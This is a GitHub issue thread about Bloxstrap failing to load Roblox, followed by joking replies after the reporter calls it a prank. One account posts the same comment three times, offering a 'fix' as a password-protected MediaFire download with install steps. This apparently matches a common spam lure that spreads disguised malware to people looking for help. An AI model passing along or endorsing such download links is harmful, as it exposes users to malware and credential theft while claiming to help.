### ISSUE TITLE
I cant load my bloxtrap my roblox

### ISSUE THREAD

**Issue by concacsieuto123456** [pizzaboxer/bloxstrap#2786]
### Acknowledgement of preliminary instructions

- [X] I have read the preliminary instructions, and I am certain that my problem has not already been addressed.
- [X] I have thoroughly looked through the available Wiki articles and could not find a solution to my problem.
- [X] I am using the latest version of Bloxstrap.
- [ ] I did not answer truthfully to all the above checkboxes.

### What problem did you encounter?

i cant play roblox and its not downloading the new roblox.(ill put my settings in the preview)
![image](https://github.com/user-attachments/assets/67a13c93-aafb-48ca-926e-584037cb7ad7)

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by concacsieuto123456** [comment]
From me,
 Thank you for helping me but,this whole thing was a prank xD! I already
found the bug on the wiki and i just wanna test how good pizzaboxer staff
can be!
 Thank you

**Comment by pizzaboxer** [comment]
haha bro you got me

**Comment by bluepilledgreat** [comment]
haha bro you got me

**Comment by pizzaboxer** [comment]
shut up

**Comment by bluepilledgreat** [comment]
shut up

**Comment by Encythe** [comment]
are you guys clinically insane

**Comment by concacsieuto123456** [comment]
xDD

Vào Th 7, 31 thg 8, 2024 lúc 20:36 pizzaboxer ***@***.***> đã
viết:
